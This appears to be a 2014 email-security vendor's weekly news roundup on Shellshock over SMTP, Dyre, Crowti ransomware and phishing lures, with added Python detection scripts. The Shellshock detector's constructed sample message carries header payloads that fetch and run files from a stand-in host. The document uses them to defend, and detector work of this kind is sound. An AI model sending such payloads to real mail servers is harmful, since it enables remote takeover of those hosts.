Week in review 31 October 2014
In case you missed it, MailShark was listed in NetworkWorld new products of the week. We are item 14 in the slideshow.
In news that probably surprises no-one, SMTP is now being used to deliver Shellshock attacks. Equally unsurprising, cyber criminals are using the current Ebola crisis as a phishing lure. The overall theme for the week, though, was advisories: US-CERT posted one on Dyre, Microsoft posted one on Crowti ransomware and Apple posted an advisory on iCloud phishing attempts.
Apple issues warnings on iCloud phishing
Apple has defended its iCloud service, after doubts were raised in the wake of some high profile hacks of celebrity iCloud accounts. It’s not just celebrity accounts; general users have been targeted via phishing campaigns. With this in mind, Apple took the step of issuing a warning on its website over phishing threats. The warning contains screenshots of what to expect when a site is bogus; basically, if a user tries to log in to iCloud and the browser warns that the site’s digital certificate is invalid, then they should not proceed any further, because a genuine iCloud page is always served with a valid certificate. It appears that some users have been tricked by the phishing websites already; Apple has stated that some anomalous activity has been detected on individual user accounts.
SMTP being used for Shellshock attacks
It was probably inevitable that attackers would eventually use SMTP to deliver Shellshock. This week saw the first such instances. The attack places the bash payload in the message headers (Subject, From, To and others, since the attacker does not know which one the target will export), so that any mail server, or filter it invokes, that passes header values into the environment of a bash child process ends up executing the trailing command. That command downloads a script into the /tmp directory and runs it. The usual payload is malware that provides a command and control capability for the attacker; the compromised server can then be enrolled in a botnet and used to launch Distributed Denial of Service attacks. This latest method of attack devised for Shellshock serves as a timely reminder to ensure software is kept up to date, with the bash patches in particular installed on every mail server.
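The following is an added example, not code from the original post or from MailShark: a small Python detector that walks the headers of a raw message and flags any value starting with the bash function-definition marker that Shellshock abuses, then pulls out the command and the URLs it fetches. The sample messages, header values and URLs are constructed for the example and are not a real capture; header names and the exact payload layout follow the pattern described above.

```python
import email
import re

# A Shellshock payload is an environment-variable value that starts with the
# bash function-definition marker "() {"; unpatched bash executed whatever
# followed the closing brace when it imported the variable.
MARKER_RE = re.compile(r'\(\)\s*\{')
PAYLOAD_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;\s*(?P<cmd>.*)', re.S)

# Constructed sample message (not a real capture). The payload is repeated in
# several headers because the attacker does not know which header the target's
# mail pipeline will export into the environment of a bash subprocess.
SAMPLE_MSG = b"""From: () { :; }; /bin/bash -c "wget http://example.invalid/x -O /tmp/x; chmod +x /tmp/x; /tmp/x"
To: user@example.invalid
Subject: () { :; }; /bin/bash -c "curl http://example.invalid/y -o /tmp/y; sh /tmp/y"
Date: Fri, 24 Oct 2014 10:00:00 +0000

hello
"""

# Constructed benign message: braces in a header are not enough on their own.
CLEAN_MSG = b"""From: sender@example.invalid
To: user@example.invalid
Subject: Weekly report {attached}

see attachment
"""


def find_shellshock_headers(raw):
    """Return [(header_name, trailing_command)] for every header carrying the marker.

    trailing_command is None when the marker is present but no command follows
    the function body (still worth flagging: it is a probe for vulnerable hosts).
    """
    msg = email.message_from_bytes(raw)
    hits = []
    for name, value in msg.items():
        value = str(value)
        if not MARKER_RE.search(value):
            continue
        m = PAYLOAD_RE.search(value)
        cmd = m.group('cmd').strip() if m else None
        hits.append((name, cmd))
    return hits


def dropped_urls(raw):
    """URLs the payload commands fetch, sorted, for blocklists or threat intel."""
    urls = set()
    for _, cmd in find_shellshock_headers(raw):
        if cmd:
            urls.update(re.findall(r'https?://\S+', cmd))
    return sorted(urls)


if __name__ == '__main__':
    for name, cmd in find_shellshock_headers(SAMPLE_MSG):
        print(f'{name}: {cmd}')
    print(dropped_urls(SAMPLE_MSG))
```

Run it against raw messages pulled from a mail gateway's quarantine or a mailbox file; a hit in any header is a reason to check that bash on every host in the delivery path is patched, since the exported header name varies from one mail setup to the next.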
US-CERT issues warning over Dyre
Dyre has been in circulation since at least mid September, though according to US-CERT, the current campaign to spread Dyre malware started in mid-October. The campaign takes advantage of two old vulnerabilities in Adobe Reader. Both vulnerabilities have long had patches: CVE-2013-2729 was fixed on 14 May 2013, whilst CVE-2010-0188 was fixed on 16 February 2010. The spam email used for the attack contains an attachment called “Invoice621785.pdf”, or similar. When Dyre is installed, it masquerades as “Google Update Service”. Dyre’s latest incarnation also includes the ability to send a list of the software installed on a victim PC to the attacker.
Crowti ransomware spike
Microsoft posted a warning on TechNet about a spike in detections of the Crowti ransomware. Crowti is spread via spam email. The email contains an attachment (usually a zip file) which, when opened and run, installs the malware. Microsoft has listed a number of attachment names used by the spam to lure the user into opening the attachment; they include Invoice, VOICE, document, etc. If Crowti is successful, a ransom message is displayed informing the user that their files have been encrypted. Crowti points the user to a website where they can pay a ransom in Bitcoin. The message also tells the user not to bother looking for a solution “because they do not exist”. The recommendation from Microsoft is to not pay the ransom. Affected users may need to restore their files from a backup. Microsoft also recommends performing a full system scan.
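Both the Dyre and the Crowti campaigns above rely on the same trick: an attachment named like an invoice or a voice message that is either a booby-trapped PDF or a zip containing an executable. The following is an added example, not code from the original post, Microsoft or US-CERT: a Python attachment triage routine that opens each MIME attachment, looks inside zip files for executable entries, and flags invoice-style PDF lures. The sample messages, sender addresses and attachment contents are constructed for the example; the lure names match the ones the two advisories list.

```python
import email
import io
import re
import zipfile
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

# Entry types inside a zip that a "document" has no business containing.
EXECUTABLE_EXT = {'.exe', '.scr', '.com', '.pif', '.bat', '.cmd', '.js', '.vbs'}
# Attachment names used by the Dyre and Crowti spam runs described above.
LURE_NAME_RE = re.compile(r'^(invoice|voice|document)', re.I)


def build_sample(attachment_name, payload):
    """Construct a sample spam message with one attachment (not a real capture)."""
    msg = MIMEMultipart()
    msg['From'] = 'billing@example.invalid'   # constructed sender
    msg['To'] = 'user@example.invalid'
    msg['Subject'] = 'Your invoice'
    msg.attach(MIMEText('Please see the attached invoice.'))
    part = MIMEApplication(payload, Name=attachment_name)
    part['Content-Disposition'] = f'attachment; filename="{attachment_name}"'
    msg.attach(part)
    return msg.as_bytes()


def zip_with(entry_name, data=b'MZ'):
    """Build an in-memory zip holding one entry (b'MZ' mimics a PE header)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as zf:
        zf.writestr(entry_name, data)
    return buf.getvalue()


def triage(raw):
    """Return [(attachment filename, reason)] for attachments worth quarantining."""
    msg = email.message_from_bytes(raw)
    findings = []
    for part in msg.walk():
        fn = part.get_filename()
        if not fn:
            continue                       # multipart container or plain body
        data = part.get_payload(decode=True) or b''
        lower = fn.lower()
        if lower.endswith('.zip'):
            try:
                with zipfile.ZipFile(io.BytesIO(data)) as zf:
                    names = zf.namelist()
            except zipfile.BadZipFile:
                findings.append((fn, 'unreadable zip'))
                continue
            bad = [n for n in names
                   if any(n.lower().endswith(e) for e in EXECUTABLE_EXT)]
            if bad:
                findings.append((fn, 'zip contains executable: ' + ', '.join(bad)))
        elif lower.endswith('.pdf') and LURE_NAME_RE.match(fn):
            # Only a hint: the PDF must still be scanned, but an invoice-style
            # PDF from an unknown sender is exactly the Dyre lure.
            findings.append((fn, 'invoice-style PDF lure; check Reader is patched'))
    return findings


if __name__ == '__main__':
    for raw in (build_sample('VOICE8234.zip', zip_with('VOICE8234.scr')),
                build_sample('Invoice621785.pdf', b'%PDF-1.4 constructed'),
                build_sample('report.zip', zip_with('report.txt', b'hello'))):
        print(triage(raw))
```

The zip check matters more than the name check: Crowti's lure names change, but a zip whose only content is an .exe or .scr is rarely legitimate mail, and it can be blocked at the gateway regardless of what the file is called.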
Ebola phishing campaign delivers a RAT
It was inevitable that cyber criminals would start using the current Ebola crisis for their own ends; in this case, a phishing campaign. Spam emails with the subject line “Ebola Safety Tips-By WHO” contained a link to a site. If clicked, the site would download a RAR file to the user’s PC. The RAR file contained the Remote Administration Tool (RAT) DarkComet. Whilst DarkComet is technically legitimate software, many of its capabilities have made it a favourite tool for attackers. One is its ability to hide itself from the user. Another is the ability to remotely operate the PC’s webcam and microphone. And of course, it can provide an attacker with the means to steal sensitive information, such as login credentials. Small wonder then that DarkComet is often flagged as malware by anti-virus software.